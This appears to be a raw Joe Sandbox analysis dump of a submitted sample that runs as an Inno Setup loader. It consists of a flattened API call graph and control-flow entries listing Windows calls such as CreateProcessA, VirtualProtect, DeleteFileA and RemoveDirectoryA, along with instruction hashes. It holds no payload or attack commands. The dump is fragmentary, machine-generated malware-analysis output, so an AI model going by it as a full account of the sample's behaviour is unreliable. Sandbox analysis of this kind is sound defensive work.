40560b 5692->5693 5694 405cf4 GetVersionExA 5693->5694 5695 405d0b 5694->5695 5695->5464 5697 405233 5696->5697 5698 405245 5696->5698 5699 403278 18 API calls 5697->5699 5700 40322c 4 API calls 5698->5700 5701 405243 5699->5701 5700->5701 5701->5642 5703 405274 5702->5703 5703->5650 5706 403230 5704->5706 5705 403252 5705->5680 5706->5705 5707 4025ac 4 API calls 5706->5707 5707->5705 5712 403414 5708->5712 5711 406fee 5711->5524 5713 403418 LoadLibraryA 5712->5713 5713->5711 5715 406af0 18 API calls 5714->5715 5716 406bf3 5715->5716 5717 406af0 18 API calls 5716->5717 5718 406c05 5716->5718 5717->5716 5719 403198 4 API calls 5718->5719 5720 406c1a 5719->5720 5720->5540 5722 407578 5721->5722 5723 4075b7 CreateFileA 5722->5723 5723->5558 5725 403414 5724->5725 5726 4075b7 CreateFileA 5725->5726 5726->5558 5728 407cd3 5727->5728 5732 407cc8 5727->5732 5733 407c5c 5728->5733 5731 405890 18 API calls 5731->5732 5732->5596 5734 407c70 5733->5734 5735 407caf 5733->5735 5734->5735 5737 407bac 5734->5737 5735->5731 5735->5732 5738 407bb7 5737->5738 5739 407bc8 5737->5739 5740 405890 18 API calls 5738->5740 5741 4074a0 34 API calls 5739->5741 5740->5739 5742 407bdc 5741->5742 5743 4074a0 34 API calls 5742->5743 5744 407bfd 5743->5744 5745 407918 InterlockedExchange 5744->5745 5746 407c12 5745->5746 5747 407c28 5746->5747 5748 405890 18 API calls 5746->5748 5747->5734 5748->5747 5750 402598 5749->5750 5752 4025a2 5749->5752 5755 401fd4 5750->5755 5751 40259e 5751->5752 5753 403154 4 API calls 5751->5753 5752->5622 5752->5752 5753->5752 5756 401fe8 5755->5756 5757 401fed 5755->5757 5766 401918 RtlInitializeCriticalSection 5756->5766 5759 402012 RtlEnterCriticalSection 5757->5759 5760 40201c 5757->5760 5763 401ff1 5757->5763 5759->5760 5760->5763 5773 401ee0 5760->5773 5763->5751 5764 402147 5764->5751 5765 40213d RtlLeaveCriticalSection 5765->5764 5767 401946 5766->5767 5768 40193c RtlEnterCriticalSection 5766->5768 5769 401964 LocalAlloc 5767->5769 5768->5767 5770 40197e 5769->5770 5771 4019c3 RtlLeaveCriticalSection 5770->5771 5772 4019cd 5770->5772 5771->5772 5772->5757 5776 401ef0 5773->5776 5774 401f1c 5778 401f40 5774->5778 5784 401d00 5774->5784 5776->5774 5776->5778 5779 401e58 5776->5779 5778->5764 5778->5765 5788 4016d8 5779->5788 5782 401e75 5782->5776 5785 401d4e 5784->5785 5786 401d1e 5784->5786 5785->5786 5857 401c68 5785->5857 5786->5778 5791 4016f4 5788->5791 5790 4016fe 5813 4015c4 5790->5813 5791->5790 5795 40174f 5791->5795 5797 40175b 5791->5797 5805 401430 5791->5805 5817 40132c 5791->5817 5794 40170a 5794->5797 5821 40150c 5795->5821 5797->5782 5798 401dcc 5797->5798 5831 401d80 5798->5831 5801 40132c LocalAlloc 5802 401df0 5801->5802 5803 401df8 5802->5803 5835 401b44 5802->5835 5803->5782 5806 40143f VirtualAlloc 5805->5806 5808 40146c 5806->5808 5809 40148f 5806->5809 5825 4012e4 5808->5825 5809->5791 5812 40147c VirtualFree 5812->5809 5815 40160a 5813->5815 5814 40163a 5814->5794 5815->5814 5816 401626 VirtualAlloc 5815->5816 5816->5814 5816->5815 5818 401348 5817->5818 5819 4012e4 LocalAlloc 5818->5819 5820 40138f 5819->5820 5820->5791 5824 40153b 5821->5824 5822 401594 5822->5797 5823 401568 VirtualFree 5823->5824 5824->5822 5824->5823 5828 40128c 5825->5828 5829 401298 LocalAlloc 5828->5829 5830 4012aa 5828->5830 5829->5830 5830->5809 5830->5812 5832 401d92 5831->5832 5833 401d89 5831->5833 5832->5801 5833->5832 5840 401b74 5833->5840 5836 401b61 5835->5836 5837 401b52 5835->5837 5836->5803 5838 401d00 9 API calls 5837->5838 5839 401b5f 5838->5839 5839->5803 5843 40215c 5840->5843 5842 401b95 5842->5832 5844 40217a 5843->5844 5845 402175 5843->5845 5847 4021ab RtlEnterCriticalSection 5844->5847 5849 4021b5 5844->5849 5851 40217e 5844->5851 5846 401918 4 API calls 5845->5846 5846->5844 5847->5849 5848 4021c1 5852 4022e3 RtlLeaveCriticalSection 5848->5852 5853 4022ed 5848->5853 5849->5848 5850 402244 5849->5850 5855 402270 5849->5855 5850->5851 5854 401d80 7 API calls 5850->5854 5851->5842 5852->5853 5853->5842 5854->5851 5855->5848 5856 401d00 7 API calls 5855->5856 5856->5848 5858 401c7a 5857->5858 5859 401c9d 5858->5859 5860 401caf 5858->5860 5870 40188c 5859->5870 5862 40188c 3 API calls 5860->5862 5863 401cad 5862->5863 5864 401b44 9 API calls 5863->5864 5869 401cc5 5863->5869 5865 401cd4 5864->5865 5866 401cee 5865->5866 5880 401b98 5865->5880 5885 4013a0 5866->5885 5869->5786 5871 4018b2 5870->5871 5879 40190b 5870->5879 5889 401658 5871->5889 5874 40132c LocalAlloc 5875 4018cf 5874->5875 5876 4018e6 5875->5876 5877 40150c VirtualFree 5875->5877 5878 4013a0 LocalAlloc 5876->5878 5876->5879 5877->5876 5878->5879 5879->5863 5881 401b9d 5880->5881 5882 401bab 5880->5882 5883 401b74 9 API calls 5881->5883 5882->5866 5884 401baa 5883->5884 5884->5866 5886 4013ab 5885->5886 5887 4012e4 LocalAlloc 5886->5887 5888 4013c6 5886->5888 5887->5888 5888->5869 5891 40168f 5889->5891 5890 4016cf 5890->5874 5891->5890 5892 4016a9 VirtualFree 5891->5892 5892->5891 6849 402dfa 6850 402e26 6849->6850 6851 402e0d 6849->6851 6853 402ba4 6851->6853 6854 402bc9 6853->6854 6855 402bad 6853->6855 6854->6850 6856 402bb5 RaiseException 6855->6856 6856->6854 6857 4075fa GetFileSize 6858 407626 6857->6858 6859 407616 GetLastError 6857->6859 6859->6858 6860 40761f 6859->6860 6861 40748c 35 API calls 6860->6861 6861->6858 6862 406ffb 6863 407008 SetErrorMode 6862->6863 6531 403a80 CloseHandle 6532 403a90 6531->6532 6533 403a91 GetLastError 6531->6533 6534 404283 6535 4042c3 6534->6535 6536 403154 4 API calls 6535->6536 6537 404323 6536->6537 6864 404185 6865 4041ff 6864->6865 6866 403154 4 API calls 6865->6866 6867 4041cc 6865->6867 6868 404323 6866->6868 6538 403e87 6539 403e4c 6538->6539 6540 403e62 6539->6540 6541 403e7b 6539->6541 6542 403e67 6539->6542 6547 403cc8 6540->6547 6543 402674 4 API calls 6541->6543 6545 403e78 6542->6545 6551 402674 6542->6551 6543->6545 6548 403cd6 6547->6548 6549 402674 4 API calls 6548->6549 6550 403ceb 6548->6550 6549->6550 6550->6542 6552 403154 4 API calls 6551->6552 6553 40267a 6552->6553 6553->6545 6562 407e90 6563 407eb8 VirtualFree 6562->6563 6564 407e9d 6563->6564 6567 403e95 6568 403e4c 6567->6568 6569 403e62 6568->6569 6570 403e7b 6568->6570 6571 403e67 6568->6571 6573 403cc8 4 API calls 6569->6573 6572 402674 4 API calls 6570->6572 6574 403e78 6571->6574 6575 402674 4 API calls 6571->6575 6572->6574 6573->6571 6575->6574 6576 40ac97 6585 4096fc 6576->6585 6579 402f24 5 API calls 6580 40aca1 6579->6580 6581 403198 4 API calls 6580->6581 6582 40acc0 6581->6582 6583 403198 4 API calls 6582->6583 6584 40acc8 6583->6584 6594 4056ac 6585->6594 6587 409745 6591 403198 4 API calls 6587->6591 6588 409717 6588->6587 6600 40720c 6588->6600 6590 409735 6593 40973d MessageBoxA 6590->6593 6592 40975a 6591->6592 6592->6579 6592->6580 6593->6587 6595 403154 4 API calls 6594->6595 6596 4056b1 6595->6596 6597 4056c9 6596->6597 6598 403154 4 API calls 6596->6598 6597->6588 6599 4056bf 6598->6599 6599->6588 6601 4056ac 4 API calls 6600->6601 6602 40721b 6601->6602 6603 407221 6602->6603 6604 40722f 6602->6604 6605 40322c 4 API calls 6603->6605 6607 40724b 6604->6607 6608 40723f 6604->6608 6606 40722d 6605->6606 6606->6590 6618 4032b8 6607->6618 6611 4071d0 6608->6611 6612 40322c 4 API calls 6611->6612 6613 4071df 6612->6613 6614 4071fc 6613->6614 6615 406950 CharPrevA 6613->6615 6614->6606 6616 4071eb 6615->6616 6616->6614 6617 4032fc 18 API calls 6616->6617 6617->6614 6619 403278 18 API calls 6618->6619 6620 4032c2 6619->6620 6620->6606 6621 403a97 6622 403aac 6621->6622 6623 403bbc GetStdHandle 6622->6623 6624 403b0e CreateFileA 6622->6624 6625 403ab2 6622->6625 6626 403c17 GetLastError 6623->6626 6638 403bba 6623->6638 6624->6626 6627 403b2c 6624->6627 6626->6625 6629 403b3b GetFileSize 6627->6629 6627->6638 6629->6626 6631 403b4e SetFilePointer 6629->6631 6630 403be7 GetFileType 6630->6625 6633 403c02 CloseHandle 6630->6633 6631->6626 6634 403b6a ReadFile 6631->6634 6633->6625 6634->6626 6635 403b8c 6634->6635 6636 403b9f SetFilePointer 6635->6636 6635->6638 6636->6626 6637 403bb0 SetEndOfFile 6636->6637 6637->6626 6637->6638 6638->6625 6638->6630 6643 40aaa2 6644 40aad2 6643->6644 6645 40aadc CreateWindowExA SetWindowLongA 6644->6645 6646 405194 33 API calls 6645->6646 6647 40ab5f 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab6d 6648->6649 6650 4032fc 18 API calls 6649->6650 6651 40ab7a 6650->6651 6652 406b7c 19 API calls 6651->6652 6653 40ab86 6652->6653 6654 4032fc 18 API calls 6653->6654 6655 40ab8f 6654->6655 6656 4099ec 43 API calls 6655->6656 6657 40aba1 6656->6657 6658 4098cc 19 API calls 6657->6658 6659 40abb4 6657->6659 6658->6659 6660 40abed 6659->6660 6661 4094d8 9 API calls 6659->6661 6662 40ac06 6660->6662 6665 40ac00 RemoveDirectoryA 6660->6665 6661->6660 6663 40ac1a 6662->6663 6664 40ac0f DestroyWindow 6662->6664 6666 40ac42 6663->6666 6667 40357c 4 API calls 6663->6667 6664->6663 6665->6662 6668 40ac38 6667->6668 6669 4025ac 4 API calls 6668->6669 6669->6666 6881 405ba2 6883 405ba4 6881->6883 6882 405be0 6886 405940 19 API calls 6882->6886 6883->6882 6884 405bf7 6883->6884 6885 405bda 6883->6885 6889 404cdc 19 API calls 6884->6889 6885->6882 6887 405c4c 6885->6887 6894 405bf3 6886->6894 6888 4059b0 33 API calls 6887->6888 6888->6894 6891 405c20 6889->6891 6890 403198 4 API calls 6892 405c86 6890->6892 6893 4059b0 33 API calls 6891->6893 6893->6894 6894->6890 6895 408da4 6896 408dc8 6895->6896 6897 408c80 18 API calls 6896->6897 6898 408dd1 6897->6898 6670 402caa 6671 403154 4 API calls 6670->6671 6672 402caf 6671->6672 6913 4011aa 6914 4011ac GetStdHandle 6913->6914 6673 4028ac 6674 402594 18 API calls 6673->6674 6675 4028b6 6674->6675 4985 40aab4 4986 40aab8 SetLastError 4985->4986 5017 409648 GetLastError 4986->5017 4989 40aad2 4991 40aadc CreateWindowExA SetWindowLongA 4989->4991 5030 405194 4991->5030 4995 40ab6d 4996 4032fc 18 API calls 4995->4996 4997 40ab7a 4996->4997 5047 406b7c GetCommandLineA 4997->5047 5000 4032fc 18 API calls 5001 40ab8f 5000->5001 5052 4099ec 5001->5052 5003 40aba1 5005 40abb4 5003->5005 5073 4098cc 5003->5073 5006 40abd4 5005->5006 5007 40abed 5005->5007 5079 4094d8 5006->5079 5009 40ac06 5007->5009 5012 40ac00 RemoveDirectoryA 5007->5012 5010 40ac1a 5009->5010 5011 40ac0f DestroyWindow 5009->5011 5013 40ac42 5010->5013 5087 40357c 5010->5087 5011->5010 5012->5009 5015 40ac38 5100 4025ac 5015->5100 5104 404c94 5017->5104 5025 4096c3 5119 4031b8 5025->5119 5031 4051a8 33 API calls 5030->5031 5032 4051a3 5031->5032 5033 4032fc 5032->5033 5034 403300 5033->5034 5035 40333f 5033->5035 5036 4031e8 5034->5036 5037 40330a 5034->5037 5035->4995 5044 403254 18 API calls 5036->5044 5045 4031fc 5036->5045 5038 403334 5037->5038 5039 40331d 5037->5039 5041 4034f0 18 API calls 5038->5041 5280 4034f0 5039->5280 5043 403322 5041->5043 5042 403228 5042->4995 5043->4995 5044->5045 5045->5042 5046 4025ac 4 API calls 5045->5046 5046->5042 5306 406af0 5047->5306 5049 406ba1 5050 403198 4 API calls 5049->5050 5051 406bbf 5050->5051 5051->5000 5320 4033b4 5052->5320 5054 409a27 5055 409a59 CreateProcessA 5054->5055 5056 409a65 5055->5056 5057 409a6c CloseHandle 5055->5057 5058 409648 35 API calls 5056->5058 5059 409a75 5057->5059 5058->5057 5060 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5059->5060 5061 409a7a MsgWaitForMultipleObjects 5060->5061 5061->5059 5062 409a91 5061->5062 5063 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5062->5063 5064 409a96 GetExitCodeProcess CloseHandle 5063->5064 5065 409ab6 5064->5065 5066 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5065->5066 5067 409abe 5066->5067 5067->5003 5068 402f24 5069 403154 4 API calls 5068->5069 5070 402f29 5069->5070 5326 402bcc 5070->5326 5072 402f51 5072->5072 5074 40990e 5073->5074 5075 4098d4 5073->5075 5074->5005 5075->5074 5076 403420 18 API calls 5075->5076 5077 409908 5076->5077 5329 408e80 5077->5329 5080 409532 5079->5080 5084 4094eb 5079->5084 5080->5007 5081 4094f3 Sleep 5081->5084 5082 409503 Sleep 5082->5084 5084->5080 5084->5081 5084->5082 5085 40951a GetLastError 5084->5085 5352 408fbc 5084->5352 5085->5080 5086 409524 GetLastError 5085->5086 5086->5080 5086->5084 5088 403591 5087->5088 5089 4035a0 5087->5089 5092 4035d0 5088->5092 5093 40359b 5088->5093 5097 4035b6 5088->5097 5090 4035b1 5089->5090 5091 4035b8 5089->5091 5094 403198 4 API calls 5090->5094 5095 4031b8 4 API calls 5091->5095 5092->5097 5098 40357c 4 API calls 5092->5098 5093->5089 5096 4035ec 5093->5096 5094->5097 5095->5097 5096->5097 5369 403554 5096->5369 5097->5015 5098->5092 5101 4025b0 5100->5101 5102 4025ba 5100->5102 5101->5102 5103 403154 4 API calls 5101->5103 5102->5013 5103->5102 5127 4051a8 5104->5127 5107 407284 FormatMessageA 5108 4072aa 5107->5108 5109 403278 18 API calls 5108->5109 5110 4072c7 5109->5110 5111 408da8 5110->5111 5112 408dc8 5111->5112 5270 408c80 5112->5270 5115 405890 5116 405897 5115->5116 5117 4031e8 18 API calls 5116->5117 5118 4058af 5117->5118 5118->5025 5121 4031be 5119->5121 5120 4031e3 5123 403198 5120->5123 5121->5120 5122 4025ac 4 API calls 5121->5122 5122->5121 5124 4031b7 5123->5124 5125 40319e 5123->5125 5124->4989 5124->5068 5125->5124 5126 4025ac 4 API calls 5125->5126 5126->5124 5128 4051c5 5127->5128 5135 404e58 5128->5135 5131 4051f1 5140 403278 5131->5140 5137 404e73 5135->5137 5136 404e85 5136->5131 5145 404be4 5136->5145 5137->5136 5148 404f7a 5137->5148 5155 404e4c 5137->5155 5141 403254 18 API calls 5140->5141 5142 403288 5141->5142 5143 403198 4 API calls 5142->5143 5144 4032a0 5143->5144 5144->5107 5262 405940 5145->5262 5147 404bf5 5147->5131 5149 404f8b 5148->5149 5154 404fd9 5148->5154 5152 40505f 5149->5152 5149->5154 5151 404ff7 5151->5137 5152->5151 5162 404e38 5152->5162 5154->5151 5158 404df4 5154->5158 5156 403198 4 API calls 5155->5156 5157 404e56 5156->5157 5157->5137 5159 404e02 5158->5159 5165 404bfc 5159->5165 5161 404e30 5161->5154 5192 4039a4 5162->5192 5168 4059b0 5165->5168 5167 404c15 5167->5161 5169 4059be 5168->5169 5178 404cdc LoadStringA 5169->5178 5172 405194 33 API calls 5173 4059f6 5172->5173 5181 4031e8 5173->5181 5176 4031b8 4 API calls 5177 405a1b 5176->5177 5177->5167 5179 403278 18 API calls 5178->5179 5180 404d09 5179->5180 5180->5172 5182 4031ec 5181->5182 5185 4031fc 5181->5185 5182->5185 5187 403254 5182->5187 5183 403228 5183->5176 5185->5183 5186 4025ac 4 API calls 5185->5186 5186->5183 5188 403274 5187->5188 5189 403258 5187->5189 5188->5185 5190 402594 18 API calls 5189->5190 5191 403261 5190->5191 5191->5185 5193 4039ab 5192->5193 5198 4038b4 5193->5198 5195 4039cb 5196 403198 4 API calls 5195->5196 5197 4039d2 5196->5197 5197->5151 5199 4038d5 5198->5199 5200 4038c8 5198->5200 5202 403934 5199->5202 5203 4038db 5199->5203 5226 403780 5200->5226 5204 403993 5202->5204 5205 40393b 5202->5205 5206 4038e1 5203->5206 5207 4038ee 5203->5207 5210 4037f4 3 API calls 5204->5210 5211 403941 5205->5211 5212 40394b 5205->5212 5233 403894 5206->5233 5209 403894 6 API calls 5207->5209 5215 4038fc 5209->5215 5213 4038d0 5210->5213 5248 403864 5211->5248 5214 4037f4 3 API calls 5212->5214 5213->5195 5217 40395d 5214->5217 5238 4037f4 5215->5238 5219 403864 23 API calls 5217->5219 5221 403976 5219->5221 5220 403917 5244 40374c 5220->5244 5223 40374c VariantClear 5221->5223 5225 40398b 5223->5225 5224 40392c 5224->5195 5225->5195 5227 4037f0 5226->5227 5228 403744 5226->5228 5227->5213 5228->5226 5229 4037ab 5228->5229 5230 403793 VariantClear 5228->5230 5231 4037dc VariantCopyInd 5228->5231 5232 403198 4 API calls 5228->5232 5229->5213 5230->5228 5231->5227 5231->5228 5232->5228 5253 4036b8 5233->5253 5236 40374c VariantClear 5237 4038a9 5236->5237 5237->5213 5239 403845 VariantChangeTypeEx 5238->5239 5240 40380a VariantChangeTypeEx 5238->5240 5242 403832 5239->5242 5241 403826 5240->5241 5243 40374c VariantClear 5241->5243 5242->5220 5243->5242 5245 403766 5244->5245 5246 403759 5244->5246 5245->5224 5246->5245 5247 403779 VariantClear 5246->5247 5247->5224 5259 40369c SysStringLen 5248->5259 5251 40374c VariantClear 5252 403882 5251->5252 5252->5213 5254 4036cb 5253->5254 5255 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5254->5255 5256 4036db 5254->5256 5257 40372e 5255->5257 5258 4036ed MultiByteToWideChar SysAllocStringLen 5256->5258 5257->5236 5258->5257 5260 403610 21 API calls 5259->5260 5261 4036b3 5260->5261 5261->5251 5263 40594c 5262->5263 5264 404cdc 19 API calls 5263->5264 5265 405972 5264->5265 5266 4031e8 18 API calls 5265->5266 5267 40597d 5266->5267 5268 403198 4 API calls 5267->5268 5269 405992 5268->5269 5269->5147 5271 403198 4 API calls 5270->5271 5273 408cb1 5270->5273 5271->5273 5272 4031b8 4 API calls 5274 408d69 5272->5274 5275 408cc8 5273->5275 5276 403278 18 API calls 5273->5276 5278 4032fc 18 API calls 5273->5278 5279 408cdc 5273->5279 5274->5115 5277 4032fc 18 API calls 5275->5277 5276->5273 5277->5279 5278->5273 5279->5272 5281 4034fd 5280->5281 5288 40352d 5280->5288 5282 403526 5281->5282 5284 403509 5281->5284 5285 403254 18 API calls 5282->5285 5283 403198 4 API calls 5286 403517 5283->5286 5289 4025c4 5284->5289 5285->5288 5286->5043 5288->5283 5290 4025ca 5289->5290 5291 4025dc 5290->5291 5293 403154 5290->5293 5291->5286 5291->5291 5294 403164 5293->5294 5295 40318c TlsGetValue 5293->5295 5294->5291 5296 403196 5295->5296 5297 40316f 5295->5297 5296->5291 5301 40310c 5297->5301 5299 403174 TlsGetValue 5300 403184 5299->5300 5300->5291 5302 403120 LocalAlloc 5301->5302 5303 403116 5301->5303 5304 403132 5302->5304 5305 40313e TlsSetValue 5302->5305 5303->5302 5304->5299 5305->5304 5307 406b1c 5306->5307 5308 403278 18 API calls 5307->5308 5309 406b29 5308->5309 5316 403420 5309->5316 5311 406b31 5312 4031e8 18 API calls 5311->5312 5313 406b49 5312->5313 5314 403198 4 API calls 5313->5314 5315 406b6b 5314->5315 5315->5049 5317 403426 5316->5317 5319 403437 5316->5319 5318 403254 18 API calls 5317->5318 5317->5319 5318->5319 5319->5311 5321 4033bc 5320->5321 5322 403254 18 API calls 5321->5322 5323 4033cf 5322->5323 5324 4031e8 18 API calls 5323->5324 5325 4033f7 5324->5325 5327 402bd5 RaiseException 5326->5327 5328 402be6 5326->5328 5327->5328 5328->5072 5330 408e8e 5329->5330 5332 408ea6 5330->5332 5342 408e18 5330->5342 5333 408e18 18 API calls 5332->5333 5334 408eca 5332->5334 5333->5334 5345 407918 5334->5345 5336 408ee5 5337 408e18 18 API calls 5336->5337 5338 408ef8 5336->5338 5337->5338 5339 408e18 18 API calls 5338->5339 5340 403278 18 API calls 5338->5340 5341 408f27 5338->5341 5339->5338 5340->5338 5341->5074 5343 405890 18 API calls 5342->5343 5344 408e29 5343->5344 5344->5332 5348 4078c4 5345->5348 5349 4078d6 5348->5349 5350 4078e7 5348->5350 5351 4078db InterlockedExchange 5349->5351 5350->5336 5351->5350 5360 408f70 5352->5360 5354 408fd6 5354->5084 5355 408fd2 5355->5354 5356 408ff2 DeleteFileA GetLastError 5355->5356 5357 409010 5356->5357 5366 408fac 5357->5366 5361 408f7a 5360->5361 5362 408f7e 5360->5362 5361->5355 5363 408fa0 SetLastError 5362->5363 5364 408f87 Wow64DisableWow64FsRedirection 5362->5364 5365 408f9b 5363->5365 5364->5365 5365->5355 5367 408fb1 Wow64RevertWow64FsRedirection 5366->5367 5368 408fbb 5366->5368 5367->5368 5368->5084 5370 403566 5369->5370 5372 403578 5370->5372 5373 403604 5370->5373 5372->5096 5374 40357c 5373->5374 5377 40359b 5374->5377 5380 4035d0 5374->5380 5381 4035a0 5374->5381 5383 4035b6 5374->5383 5375 4035b1 5378 403198 4 API calls 5375->5378 5376 4035b8 5379 4031b8 4 API calls 5376->5379 5377->5381 5382 4035ec 5377->5382 5378->5383 5379->5383 5380->5383 5384 40357c 4 API calls 5380->5384 5381->5375 5381->5376 5382->5383 5385 403554 4 API calls 5382->5385 5383->5370 5384->5380 5385->5382 6676 401ab9 6677 401a96 6676->6677 6678 401aa9 RtlDeleteCriticalSection 6677->6678 6679 401a9f RtlLeaveCriticalSection 6677->6679 6679->6678

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                        APIs
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                        • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2441996862-0
                                                                                        • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                        • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                        • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                        • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724B0), ref: 0040966C
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(00020478,000000FC,00409960), ref: 0040AB15
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(00020478,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
